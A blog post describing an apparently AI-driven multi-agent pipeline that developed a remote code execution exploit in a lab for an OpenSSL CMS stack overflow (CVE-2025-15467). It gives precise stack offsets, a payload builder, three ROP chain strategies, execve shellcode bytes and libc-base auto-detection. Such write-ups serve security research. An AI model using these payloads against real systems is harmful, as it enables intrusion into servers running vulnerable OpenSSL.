After twenty-four CVEs, ten bypass findings, and eight disclosure submissions, CVEForge had proven its point. Hand it a CVE number, walk away, come back to a working PoC, a Docker lab, and a vulnerability analysis. For web applications, the pipeline mostly runs itself.

But web exploitation is the shallow end of the pool.

Crafting an HTTP request with a Blade template injection in the query string is one thing. Overflowing a stack buffer by precisely 40 bytes, setting a 4-byte integer at offset 0x1c to exactly 0x10 so the subsequent memcpy doesn’t crash before you reach the return address, then building three independent ROP chains against a binary with NX enabled - that’s a different discipline. The kind where debugging happens in GDB, not a browser console. Where the payload is bytes, not text. Where one wrong nibble at the wrong offset means the difference between a segfault and a shell.

We’d been staring at this boundary since the first CVEForge run. CVEForge handles the vulnerability classes you find in web applications: SSTI, SQLi, IDOR, command injection, deserialization in managed runtimes. It doesn’t know what a return address is. It’s never built a ROP chain. It couldn’t tell you the difference between partial RELRO and full RELRO if you asked nicely.

So we forked Shannon again.

Stackforge

Same move as CVEForge: take Shannon’s infrastructure, rip out the domain-specific parts, rewire it for a different problem. This time the problem is binary exploit development - stack overflows, heap corruption, register control, ROP gadgets, shellcode, the whole classical tradecraft.

The changes were deeper this time. CVEForge replaced Shannon’s 13 web-pentest agents with 6. Stackforge replaced them with 9. All three - Shannon, CVEForge, and Stackforge - use conditional execution gates, but each asks a different question. Shannon’s gates check “did the vuln agent find anything exploitable?” CVEForge’s check “is the fix incomplete enough to attempt a bypass?” Stackforge’s ask “can you control execution?” - and the cost of a wrong answer is higher, because building ROP chains against a dead end burns real money.

The Pipeline

  1. Vulnerability Research - Queries the EIP MCP server for the full CVE brief, reviews the source code, analyzes the patch diff, maps the attack surface, assesses fix completeness.
  2. Environment Setup - Runs checksec, verifies ASLR status, checks library dependencies and their protections, confirms GDB+pwndbg, pwntools, ROPgadget, nasm, and keystone are all available.
  3. Lab Build - Builds Docker containers with the vulnerable binary exposed as a network service. For library vulnerabilities, it writes a custom C server harness, compiles it against the vulnerable library, and exposes it over TCP.
  4. Crash PoC - Achieves a controlled crash, verifies it in GDB, confirms reproducibility across 5 runs, writes a self-contained Python script. Produces a phase gate.
  5. Control Analysis - Maps register control at the crash point, calculates precise buffer offsets, discovers ROP gadgets in the binary and libraries, recommends an exploitation strategy. Produces a phase gate.
  6. Exploit Development - Builds the actual exploit: ROP chain construction, shellcode, payload layout with bad character handling and stack alignment. Iterates with GDB until code execution is achieved.
  7. Exploit Validation - Runs the exploit 5+ times with container restarts between runs, tests all strategies, verifies RCE evidence in GDB. Calculates success rate.
  8. Report - Full writeup with methodology, payload breakdown, and mitigation recommendations.
  9. Bypass (conditional) - Same as CVEForge. Only fires if vulnerability research flagged the fix as incomplete.

The Gates

Shannon, CVEForge, and Stackforge all use conditional execution gates - it’s a pattern that carries across all three forks. But binary exploit development has harder failure modes than web exploitation. The buffer overflow is real but a stack canary blocks RIP control. The vulnerability is a read-only out-of-bounds with nothing useful to overwrite. The heap layout is unpredictable and the primitive is write-one-null. These are the failure modes where you want to stop early rather than spend $15 on a ROP chain that can’t land. In Stackforge, the crash-poc agent writes a crash_gate.json:

{"proceed": true, "reason": "Crash confirmed with SIGSEGV at 0x7ffff7777a8c"}

Or:

{"proceed": false, "reason": "Buffer overflow exists but canary terminates before ret"}

The control-analysis agent does the same. If either gate fails, the pipeline short-circuits to the report phase. You still get useful output - the research, the environment analysis, the partial crash analysis - but you don’t burn $15 building ROP chains for a vulnerability that can’t be exploited. Knowing when to stop is as important as knowing how to start.
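
The gate check itself is deliberately trivial. A minimal Python sketch of the logic (the real orchestration is Temporal-based; the file name comes from the example above, and treating a missing or malformed gate file as a failed gate is an assumption - but it is the safe default for a cost gate):

```python
import json
from pathlib import Path

def check_gate(path: str) -> tuple[bool, str]:
    """Read a phase gate file and decide whether the pipeline proceeds.

    A missing or malformed gate is treated as a failed gate: the safe
    default is to short-circuit to the report phase rather than spend
    money building ROP chains against an unconfirmed primitive.
    """
    gate_file = Path(path)
    if not gate_file.exists():
        return False, "gate file missing"
    try:
        gate = json.loads(gate_file.read_text())
    except json.JSONDecodeError:
        return False, "gate file malformed"
    return bool(gate.get("proceed")), gate.get("reason", "")

# proceed, reason = check_gate("crash_gate.json")
# next_phase = "control-analysis" if proceed else "report"
```

The asymmetry is the point: a false "proceed" costs ~$10 of downstream agent time, a false "stop" costs one re-run, so anything ambiguous resolves to stop.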

The Tooling

CVEForge’s MCP stack was simple: EIP for intelligence, Docker CLI for labs. Stackforge needed more. Exploit development is interactive in a way that web PoC generation isn’t. You need to see inside the process while it’s running.

GDB MCP - Tasuku Suzuki’s mcp-gdb gives agents a debugger as a first-class tool. Launch processes under GDB, set breakpoints at arbitrary addresses, step through instructions, examine registers and memory, watch memory locations, analyze crash dumps. The crash-poc agent uses it to confirm the crash location and register state. The control-analysis agent uses it to map payload bytes to register values. The exploit-dev agent uses it to verify each gadget in the ROP chain. Making the debugger an MCP tool was the single most impactful design decision. The exploit-dev agent called GDB 47 times during the successful run.

SharkMCP - A heavily modified fork of tuliperis’s SharkMCP, reshaped for exploit development. Eight tools: start and stop capture sessions with BPF filters, analyze PCAP files with display filters, list and follow TCP/UDP streams in hex, extract fuzz seeds from captured traffic, and manage reusable filter configurations. For network-delivered exploits - which is what Stackforge builds - seeing the actual bytes on the wire is the difference between guessing why the exploit failed and knowing. We added TLS decryption via SSLKEYLOGFILE, JSON pagination for large captures, and hex stream following - the features you need when you’re debugging why a ROP chain isn’t landing over a TLS connection.

stackforge-helper - Three tools: save_deliverable (same as CVEForge), run_exploit_test (execute a command, capture exit code, signal, stdout/stderr, and core dump status), and check_binary_protections (structured checksec: RELRO, canary, NX, PIE, FORTIFY). run_exploit_test is what lets agents iterate without manual shell interaction - send a payload, check if you got SIGSEGV, adjust, repeat. Boring but critical.
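
The behavior of run_exploit_test can be approximated in a few lines of Python (a sketch only - the real tool lives in stackforge-helper; this mirrors the described outputs, not its implementation):

```python
import signal
import subprocess

def run_exploit_test(cmd: list[str], timeout: int = 30) -> dict:
    """Run a command and report the fields the agents iterate on:
    exit code, delivering signal (if any), and captured output."""
    try:
        proc = subprocess.run(cmd, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return {"timeout": True}
    result = {
        "exit_code": proc.returncode,
        "signal": None,
        "stdout": proc.stdout.decode(errors="replace"),
        "stderr": proc.stderr.decode(errors="replace"),
        "timeout": False,
    }
    # A negative return code means the process died from a signal.
    if proc.returncode < 0:
        result["signal"] = signal.Signals(-proc.returncode).name
    return result
```

The send-payload/check-for-SIGSEGV/adjust loop is just repeated calls to this with different payload scripts; structured output is what makes it usable by an agent instead of a human eyeballing a terminal.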

The First Run: CVE-2025-15467

We needed something with genuine binary exploitation complexity. Not a web app. Not a managed runtime. A stack buffer overflow in C, in a library that matters, with protections to work around.

CVE-2025-15467 in OpenSSL 3.4.3 - though the vulnerable code exists in every OpenSSL release from 3.0.0 through 3.6.0. A stack buffer overflow in evp_cipher_get_asn1_aead_params(), the function that parses GCM cipher parameters from CMS AuthEnvelopedData structures. The vulnerability is a double-call pattern:

// First call: returns actual IV length into i (attacker-controlled)
i = ossl_asn1_type_get_octetstring_int(type, NULL, EVP_MAX_IV_LENGTH, &tl);

// Second call: uses i as max_len instead of EVP_MAX_IV_LENGTH
ossl_asn1_type_get_octetstring_int(type, iv, i, &tl);
// → memcpy copies i bytes into 16-byte iv[] buffer → overflow

The iv buffer is 16 bytes (EVP_MAX_IV_LENGTH). The attacker controls the GCM nonce length in the CMS structure. Set it to 256 bytes and you overflow the stack with controlled data.
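
The broken bound is easy to model. A minimal Python simulation of the double-call pattern (names mirror the C code; the buffer arithmetic, not the ASN.1 parsing, is the point - in Python the bytearray simply grows where the C memcpy would run off the end of the stack buffer):

```python
EVP_MAX_IV_LENGTH = 16

def get_octetstring_int(src: bytes, out, max_len: int) -> int:
    """Model of ossl_asn1_type_get_octetstring_int: copies at most
    max_len bytes, but always RETURNS the actual length of src."""
    if out is not None:
        n = min(max_len, len(src))
        out[:n] = src[:n]          # stands in for the memcpy
    return len(src)

nonce = b"A" * 256                 # attacker-controlled GCM nonce
iv = bytearray(EVP_MAX_IV_LENGTH)  # the 16-byte stack buffer

# First call: bounded correctly, but i receives the ACTUAL length (256).
i = get_octetstring_int(nonce, None, EVP_MAX_IV_LENGTH)

# Second call: uses i as max_len instead of EVP_MAX_IV_LENGTH.
get_octetstring_int(nonce, iv, i)

# In C this memcpy writes 240 bytes past the buffer; here the bytearray
# grows instead, which makes the broken bound visible:
assert len(iv) == 256
```

Two calls with the same signature, two different meanings of the length argument - the bug is invisible unless you read both call sites together.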

The binary protections on the lab server: no RELRO, no canary, NX enabled, no PIE, no FORTIFY. Hard enough to be interesting (NX means no direct shellcode - you need ROP), soft enough to be tractable for a first run.

./stackforge start CVE=CVE-2025-15467

What Happened

The vulnerability research agent pulled the CVE brief from EIP, cloned the OpenSSL 3.4.3 source, found the vulnerable function at crypto/evp/evp_lib.c:221-240, and traced the call chain from CMS_decrypt() through ossl_cms_EncryptedContent_init_bio() into the vulnerable function. It identified the root cause: ossl_asn1_type_get_octetstring_int() returns the actual IV length but only copies min(max_len, actual_length) bytes. The caller uses the returned length as max_len for the second call. A subtle API misuse - the kind where the return value semantics and the copy semantics diverge.

The agent then did something we didn’t explicitly ask for: it checked every other caller of the same function in the OpenSSL tree. Eleven files declare iv[EVP_MAX_IV_LENGTH] on the stack. Ten of them are safe - they use the cipher’s declared IV length as the bound, or validate the returned length matches exactly. Only the GCM parameter handler is vulnerable. It also confirmed the PKCS#7 path is safe - EVP_CIPHER_asn1_to_param() passes NULL for the params struct, and the vulnerable function returns early. Good to know if your exposure is PKCS#7-only.

The fix eliminates the double-call pattern entirely: one call, EVP_MAX_IV_LENGTH as the bound, explicit rejection if the returned length exceeds 16. Correct and complete. Fifteen and a half minutes.

Then the lab build agent did something that still impresses us. We told it to exploit OpenSSL. OpenSSL is a library - there’s no binary you can point an exploit at and send it a malicious packet. There’s no listening port. There’s no attack surface until something calls the vulnerable function. The agent’s response was to write its own vulnerable application.

It authored cms_server.c from scratch - a 150-line C program that opens a TCP socket on port 4433, accepts connections, reads a length-prefixed CMS message, and passes it straight into CMS_decrypt(). A minimal, purpose-built attack surface. It compiled the harness against the vulnerable OpenSSL 3.4.3 libraries with the right linker flags (-L/opt/openssl-vuln/lib64 -lcrypto -lssl), built a Docker container with the certificate and key material, joined it to the stackforge_default network, and verified the service was processing valid CMS messages before declaring the lab ready.
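
Delivering a payload to that harness is a one-liner plus framing. A sketch of the client side (the 4-byte big-endian length prefix is an assumption for illustration - the real framing is whatever cms_server.c reads; host and port are placeholders):

```python
import socket
import struct

def frame(cms_der: bytes) -> bytes:
    """Prefix a DER-encoded CMS blob with its length.
    Assumes a 4-byte big-endian prefix - the harness defines the truth."""
    return struct.pack(">I", len(cms_der)) + cms_der

def send_cms(host: str, port: int, cms_der: bytes) -> None:
    """Deliver one framed CMS message to the lab harness."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(frame(cms_der))

# send_cms("lab", 4433, open("crash.cms", "rb").read())
```

Everything downstream - crash PoC, control analysis, the final exploit - reuses this delivery path; only the bytes inside the frame change.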

Nobody told it to write a server harness. The prompt said “build a lab environment.” The agent looked at the target - a library, not a binary - and concluded it needed to create the application that makes the vulnerability reachable. Fourteen minutes and forty-two seconds.

The crash-poc agent found the pre-built crash CMS in the workspace, tested it both locally and over the network, confirmed SIGSEGV in GDB - rdx = 0x41414141, the corrupted i variable being fed to memcpy - and ran 5 reliability tests. 100% crash rate. The server auto-restarts between crashes. Five minutes and forty-five seconds. Crash gate: proceed.

The control-analysis agent mapped the stack layout at the vulnerable function:

Offset  Size  Content
0x00    16    iv[16] buffer        ← overflow starts here
0x10    8     tl (long)
0x18    4     padding
0x1c    4     i (int)              ← controls memcpy size
0x20    8     saved RBP
0x28    8     saved RIP            ← return address
0x30+   ...   caller stack frame   ← ROP chain goes here

Here’s the trick that separates a DoS from RCE. If you fill everything with 0x41, the i variable at offset 0x1c becomes 0x41414141. The subsequent memcpy(asn1_params->iv, iv, i) tries to copy a gigabyte and segfaults immediately - a crash, but the function never returns, so your ROP chain at offset 0x28 never executes. To get code execution, you need to set i to exactly 16 at offset 0x1c. That way the second memcpy copies 16 bytes into asn1_params->iv, returns normally - and lands on your controlled return address.

One wrong byte at one offset. The agent figured this out by examining the source code, cross-referencing the GDB crash data, and reasoning about the stack layout. It then ran ROPgadget against libc and inventoried the usable gadgets: pop rdi; ret, pop rsi; ret, pop rdx; ret, syscall; ret, jmp rsp. Eleven minutes. Control gate: proceed.
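
The stack layout and the i=16 constraint translate directly into a payload builder. A pwntools-free sketch (gadget addresses below are placeholders - the real ones came from the ROPgadget inventory):

```python
import struct

def p32(v: int) -> bytes:
    return struct.pack("<I", v)

def p64(v: int) -> bytes:
    return struct.pack("<Q", v)

def build_payload(rop_chain: list[int]) -> bytes:
    """Lay out the frame from the control-analysis table. The byte that
    matters: i at offset 0x1c must be 16 so the second memcpy copies
    exactly 16 bytes and the function RETURNS into the chain."""
    payload  = b"A" * 16                  # 0x00: iv[16], overflow starts here
    payload += p64(0)                     # 0x10: tl (long), value irrelevant
    payload += p32(0)                     # 0x18: padding
    payload += p32(16)                    # 0x1c: i - MUST be 16, not 0x41414141
    payload += p64(0xdeadbeefcafebabe)    # 0x20: saved RBP (controlled, unused)
    for gadget in rop_chain:              # 0x28: saved RIP, then the rest
        payload += p64(gadget)
    return payload

# Placeholder chain: pop rdi; ret, then an argument.
demo = build_payload([0x7ffff77c87e5, 0x7ffffffde000])
```

The three strategies below differ only in what goes into rop_chain; the first 0x28 bytes are identical across all of them.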

The exploit-dev agent built three independent RCE strategies:

Strategy         Payload    Gadgets         Technique
ret2system       72 bytes   4               pop rdi → "/bin/sh" → system()
execve_syscall   112 bytes  9               Pure ROP: set rax=59, rdi, rsi, rdx → syscall
mprotect_jmprsp  129 bytes  8 + shellcode   mprotect(stack, RWX) → jmp rsp → 25-byte execve shellcode

The 25-byte shellcode is a textbook execve("/bin//sh", NULL, NULL):

xor    rsi, rsi              ; argv = NULL
push   rsi                   ; push NULL terminator
movabs rdi, "/bin//sh"       ; load path
push   rdi                   ; push onto stack
mov    rdi, rsp              ; rdi → path string
xor    rdx, rdx              ; envp = NULL
mov    al, 59                ; SYS_execve
syscall
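
Hand-assembling those instructions gives the 25 bytes (my own byte-level rendering of the listing above; the first qword matches the 0x622fbf4856f63148 visible at the top of the shellcode in the GDB trace later in the post):

```python
shellcode = bytes([
    0x48, 0x31, 0xf6,        # xor    rsi, rsi        ; argv = NULL
    0x56,                    # push   rsi             ; NULL terminator
    0x48, 0xbf,              # movabs rdi, imm64 ...
    0x2f, 0x62, 0x69, 0x6e,  # ... "/bin"
    0x2f, 0x2f, 0x73, 0x68,  # ... "//sh"
    0x57,                    # push   rdi             ; path onto stack
    0x48, 0x89, 0xe7,        # mov    rdi, rsp        ; rdi -> path string
    0x48, 0x31, 0xd2,        # xor    rdx, rdx        ; envp = NULL
    0xb0, 0x3b,              # mov    al, 59          ; SYS_execve
    0x0f, 0x05,              # syscall
])

assert len(shellcode) == 25
```

The double slash in "/bin//sh" pads the path to exactly 8 bytes so it fits one movabs immediate with no NUL bytes - a classic trick for compact, bad-character-free shellcode.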

One detail worth noting: the vuln-research agent surfaced a public RCE exploit via EIP (by guiimoraes, classified working_poc). The exploit-dev agent pulled the source as reference - and noticed it used RIP_OFFSET = 56. The control-analysis deliverable said 40. The difference: guiimoraes targets the OpenSSL CLI binary (openssl cms -decrypt), which is compiled with optimization and spills additional callee-saved registers onto the stack, adding 16 bytes to the frame. Our cms_server was compiled with -O0 -fno-stack-protector - tighter frame, offset 0x28. The agent recognized this was a different binary with a different stack layout, trusted its own GDB data, and built accordingly. The intelligence helped; blind copying would have crashed.

Thirteen minutes of iterative GDB debugging - 47 GDB MCP calls in this phase alone. The smallest exploit (ret2system) is 72 bytes. The largest (mprotect + shellcode) is 129 bytes. All three fit inside a single TCP packet: 534-598 bytes of CMS data, one connection, no authentication.

The validation agent then restarted the container between each test, ran each strategy 5 times, and verified RCE with GDB attached to the server process. Here’s the money shot - the complete GDB trace for the mprotect chain:

====== BREAKPOINT 1: RET of vulnerable function ======
RBP = 0xdeadbeefcafebabe         ← controlled (payload[0x20-0x27])
RSP → 0x00007ffff77c87e5         ← pop rdi; ret (first ROP gadget)

Full ROP chain on stack:
0x7fffffffe7d8: 0x00007ffff77c87e5   pop rdi; ret
0x7fffffffe7e0: 0x00007ffffffde000   stack page address
0x7fffffffe7e8: 0x00007ffff77c9f99   pop rsi; ret
0x7fffffffe7f0: 0x0000000000021000   132KB
0x7fffffffe7f8: 0x00007ffff789eefd   pop rdx; ret
0x7fffffffe800: 0x0000000000000007   PROT_RWX
0x7fffffffe808: 0x00007ffff78a2a20   mprotect()
0x7fffffffe810: 0x00007ffff77a6c09   jmp rsp
0x7fffffffe818: 0x622fbf4856f63148   shellcode bytes...

====== BREAKPOINT 2: mprotect() ======
rdi (addr) = 0x7ffffffde000          ✓ stack page
rsi (len)  = 0x21000                 ✓ 132KB
rdx (prot) = 0x7                     ✓ PROT_READ|PROT_WRITE|PROT_EXEC

====== BREAKPOINT 3: jmp rsp → shellcode ======
0x7fffffffe818: xor    %rsi,%rsi
0x7fffffffe81c: movabs $0x68732f2f6e69622f,%rdi    ← "/bin//sh"
0x7fffffffe82d: mov    $0x3b,%al                    ← SYS_execve (59)
0x7fffffffe82f: syscall

>>> process 1 is executing new program: /usr/bin/dash

The server process - PID 1 - is gone. Replaced by a shell. That last line is GDB telling you the cms_server binary no longer exists in memory. execve didn’t spawn a child process. It became /usr/bin/dash. That’s RCE in the classical, unambiguous sense.

A surprise during development: setarch x86_64 -R does not fully disable ASLR. The exploit-dev agent discovered at turn 90 that libc had shifted by one page - 0x7ffff77a2000 on one run, 0x7ffff77a1000 on the next. A 0x1000 jitter. The agent’s response was to add auto-detection: before sending the payload, query /proc/1/maps inside the container for the actual libc base. The exploit now works regardless of the jitter. A small thing, but the kind of adaptation that separates a demo from a tool.
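
The auto-detection itself is a short parse of the maps file. A sketch (the sample text and the gadget offset are illustrative, not the run's real values):

```python
def libc_base(maps_text: str) -> int:
    """Return the lowest mapped address of libc from /proc/<pid>/maps text.
    Every gadget address is rebased against it before the payload is built."""
    for line in maps_text.splitlines():
        if "libc" in line:
            return int(line.split("-")[0], 16)
    raise RuntimeError("libc not mapped")

# Maps text for PID 1 inside the lab container, e.g. obtained via
# something like: docker exec <lab> cat /proc/1/maps
sample = (
    "7ffff77a1000-7ffff77c9000 r--p 00000000 08:01 123 /usr/lib/libc.so.6\n"
    "7ffff77c9000-7ffff7944000 r-xp 00028000 08:01 123 /usr/lib/libc.so.6\n"
)
base = libc_base(sample)
pop_rdi = base + 0x287e5   # placeholder offset for pop rdi; ret
```

Because gadgets are stored as offsets and rebased per run, the 0x1000 jitter becomes irrelevant: the chain is assembled fresh against whatever base the target process actually has.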

The validation agent ran 10 edge cases on top of the 7 reliability runs: normal nonces (12 and 16 bytes) don’t crash, a 17-byte nonce overflows but doesn’t reach RIP, setting i to zero still lets the ROP chain fire, 512-byte payloads work fine, rapid-fire back-to-back exploits succeed after the 2-second server restart, and truncated CMS messages get a clean ASN.1 parse error. All passed. 7/7 reliability, 10/10 edge cases.

The Struggle (Honest Version)

That was run number nine.

Runs one through eight failed. The first three couldn’t even build the lab - the agent tried to use openssl s_server as the target, which doesn’t call CMS_decrypt() and can’t be crashed with a CMS payload. Three runs burned before the agent made the conceptual leap that it needed to write its own vulnerable application. That insight - the library has no attack surface until you build one - was the most expensive lesson in the whole project.

Run four tried to build OpenSSL from source inside the container - a 20-minute compile that timed out. Run five switched to pre-built libraries but got the linker flags wrong: no -L path, so the system’s OpenSSL was linking instead of the vulnerable one. Then the -lssl symlink was missing. Then openssl.cnf was missing, so the certificate generation for the test CMS files failed. Then the crash didn’t trigger because the recipient cert in the test CMS didn’t match the dummy cert the harness was using. Each problem self-corrected within a few turns, but the lab-build phase consumed ~95 turns across the failed runs. Run six fixed the lab but the crash-poc agent couldn’t construct the right CMS ASN.1 structure from scratch - DER encoding is finicky and the agent kept producing malformed messages that OpenSSL rejected before reaching the vulnerable function.

Run seven almost worked - the agent got all the way to control-analysis before using the wrong libc base address. It checked /proc/self/maps (the Stackforge worker container) instead of the server process inside the lab container. The ROP chain pointed at the wrong addresses. Run eight reached exploit-dev but hit a Temporal activity timeout at 2 hours while iterating on the ROP chain.

Run nine worked. Every agent succeeded on the first attempt. All the lessons from runs one through eight were baked into the prompts and workspace: the pre-built harness source, the correct libc lookup method, the pre-generated crash CMS template, the Docker networking hints. Not magic. Residue. The same loop we ran with CVEForge - run, fail, learn, encode, run again - just with harder problems and more spectacular failures.

Watching an AI agent get the linker flags wrong three times in a row is a humbling experience. We’ve all been there, of course. But watching it happen at $5 per attempt adds a certain urgency to the prompt engineering.

The Numbers

The full pipeline completed. Eight phases, all on the first attempt:

Phase                   Agent               Duration  Cost    % Time
Vulnerability Research  vuln-research       15m 34s   $4.73   18.4%
Environment Setup       env-setup           3m 48s    $0.90   4.5%
Lab Build               lab-build           14m 42s   $3.58   17.4%
Crash PoC               crash-poc           5m 45s    $1.79   6.8%
Control Analysis        control-analysis    11m 11s   $3.95   13.2%
Exploit Development     exploit-dev         13m 14s   $5.56   15.6%
Exploit Validation      exploit-validation  15m 54s   $3.59   18.7%
Report                  report              4m 38s    $1.04   5.5%
Bypass                  bypass              skipped   -       -
Total                                       84m 46s   $25.15  100%

First RCE was achieved at the 64-minute mark (end of exploit-dev). Validation and reporting added another 20 minutes - the validation agent is thorough, running 7 reliability tests across all three strategies plus 10 edge cases, with GDB-attached breakpoint verification for each strategy.

The bypass agent was skipped because the vulnerability research assessed the fix as correct and complete - it eliminates the double-call pattern entirely and adds an explicit length check. The right call.

Exploit-dev was the most expensive phase at $5.56. The iterative GDB loop burns tokens - the agent called the GDB MCP tool 47 times in 13 minutes. Validation was close behind at $3.59 because it restarts containers between runs and attaches GDB to the server process for each strategy verification. The cheapest meaningful phase was crash-poc at $1.79 - it had good workspace context from the earlier agents and the pre-built crash CMS.

The phase gates saved nothing this time (both passed), but on a non-exploitable vulnerability they’d save the entire exploit-dev, validation, and reporting cost - roughly $10.

If you’re counting: eight failed runs at roughly $5-15 each, then the successful run at $25.15. Total development cost was closer to $100. That’s the honest number for going from zero to a working pipeline on a new vulnerability class. The ninth run is the one you show people. The first eight are the ones that taught the prompts.

What the EIP MCP Server Did

The Exploit Intelligence Platform MCP server is ours. We built it, we run it, and it’s the intelligence backbone of both CVEForge and Stackforge. It deserves a moment here because what it provided to this run matters.

The vuln-research agent’s first tool call was get_vulnerability for CVE-2025-15467. Back came: CVSS 9.8, affected versions (OpenSSL 3.0.0 through 3.6.0), CWE-787/CWE-121, the fix commit hash, four public exploits with AI-generated quality classifications, Nuclei templates, and upstream references. One call, five seconds, everything the agent needed to start. No tab-switching, no copy-pasting from NVD and ExploitDB and GitHub.

Then get_exploit_analysis on the top-ranked public exploit - classified as working_poc, no trojan indicators, reliability rated as reliable. The agent used that as a reference for its own crash PoC, adapting the DER construction approach rather than starting from scratch. get_exploit_code pulled the actual source. The intelligence didn’t just save time on the first agent - it cascaded through the pipeline. The crash-poc agent had a working CMS template because the vuln-research agent knew where to look. The exploit-dev agent had ROP chain precedent because EIP surfaced a public exploit that used the same technique.

Seventeen tools, real-time data from NVD, CISA KEV, EPSS, ExploitDB, Metasploit, GitHub, and six other sources. No API key required. The same EIP MCP server that powered CVEForge’s twenty-four CVEs powered this one too - it just had to answer different questions. “What are the gadget offsets?” isn’t in its vocabulary, but “What’s the fix commit and are there working public exploits?” is exactly the kind of intelligence that turns a 15-minute research phase into something that would otherwise take an hour of manual triage.

What This Isn’t

We should be direct about what Stackforge doesn’t prove yet.

ASLR was disabled. PIE was off. The binary had no stack canary and no FORTIFY. The server harness was purpose-built for exploitation. This is a controlled lab with the training wheels on. Real-world binary exploitation against a hardened target - with ASLR, full RELRO, stack canaries, and position-independent code - is a harder problem by an order of magnitude.

We know that. The point of this run was to validate the architecture: can nine agents, orchestrated by Temporal, using GDB and SharkMCP and EIP as tools, collaborate to produce a working binary exploit? Can the phase gate system short-circuit gracefully? Can the pipeline iterate through the crash-control-exploit cycle the way a human exploit developer does - crash it, map what you control, build the chain, verify it works?

The answer is yes. On easy mode, with the protections turned down and the environment controlled, but yes. The architecture works. The agents can use GDB. The pipeline produces real ROP chains that achieve real code execution - verified by GDB reporting “process 1 is executing new program: /usr/bin/dash.”

The vulnerability itself is real regardless of protections. Any application calling CMS_decrypt() with AES-GCM on untrusted input is affected - email servers processing S/MIME, web APIs accepting CMS payloads, certificate enrollment systems, anything using OpenSSL 3.0.0 through 3.6.0. With protections enabled, exploitation is harder. Without them, it’s a single TCP packet.

Now we turn the protections back on.

What’s Next

The run surfaced five concrete improvements. We implemented all of them before writing this post - the same loop we ran with CVEForge. Run, fail, learn, encode, run again.

  1. Binary path validation in preflight. The config said /opt/openssl-vuln/bin/openssl; the actual path inside the container was /targets/cve-2025-15467/openssl-vuln/bin/openssl. Twenty turns wasted discovering this. Now preflight.ts validates that binary_path exists after target setup. If the configured path is missing but a matching binary exists under the target directory, it creates a symlink. If it can’t find it at all, it logs a warning - non-fatal, since the env-setup agent can still discover it, but at least the obvious case is handled.

  2. ASLR enforcement in preflight. The config says aslr: disabled but the container started with randomize_va_space=2. The agent had to manually write to /proc/sys/kernel/randomize_va_space. Now a new enforceEnvironmentConfig() step in preflight reads the config’s environment settings and applies them before any agent runs. The worker container has SYS_PTRACE and the entrypoint runs as root, so we have the access. Non-fatal on failure - the agent can still do it manually.
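A minimal Python sketch of that enforcement step (the real implementation lives in preflight.ts; the sysctl path is parameterized here so the non-fatal failure path is visible):

```python
def enforce_aslr(desired: int,
                 path: str = "/proc/sys/kernel/randomize_va_space") -> bool:
    """Apply the config's ASLR setting (0=off, 1=conservative, 2=full).
    Non-fatal by design: returns False on any failure so the pipeline
    continues and the env-setup agent can apply it manually instead."""
    try:
        with open(path, "w") as f:
            f.write(str(desired))
        with open(path) as f:
            return f.read().strip() == str(desired)
    except OSError:
        return False

# enforce_aslr(0)  # config says aslr: disabled
```

The write-then-read-back matters: inside some container configurations the write silently fails or the sysctl is read-only, and the pipeline should know the setting it asked for is the setting it got.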

  3. Lab prompt hints. “Use pre-built libraries, don’t compile from source.” “Ensure library symlinks exist for linker flags.” “Include config files the software expects at runtime.” “For TLS/crypto vulnerabilities, ensure test certificates match the data format being tested.” Four lines in the prompt, thirty turns saved.

  4. Env-setup deduplication. The environment agent called check_binary_protections twice on the same libraries. A one-line prompt addition: “Track what you’ve already checked; avoid redundant tool calls.”

  5. Preflight .gitignore for build directories. The git checkpoint system (git add -A) choked on embedded git repos in the target directory - the same issue CVEForge had. Preflight now creates a .gitignore with entries for build/, *.o, *.so, and nested .git/ directories. Only if one doesn’t already exist.

Beyond the pipeline fixes: ASLR bypass is the next vulnerability class to tackle. Information leak primitives, partial overwrites, the whole ASLR defeat toolkit. Then PIE, then stack canaries, then heap exploitation - use-after-free, double-free, tcache poisoning - which is a fundamentally different workflow that may need new agents entirely.

Stackforge is rougher than CVEForge was at this stage. But the foundation - Shannon’s orchestration, the phase gates, the MCP tool integration, and the GDB/SharkMCP tooling - is solid. The improvements are prompt-level and infrastructure-level, not architectural. The architecture works.

One CVE number. Nine agents. Four MCP servers. Three ROP chains. Twenty-five dollars. process 1 is executing new program: /usr/bin/dash. Old-school exploit development, automated.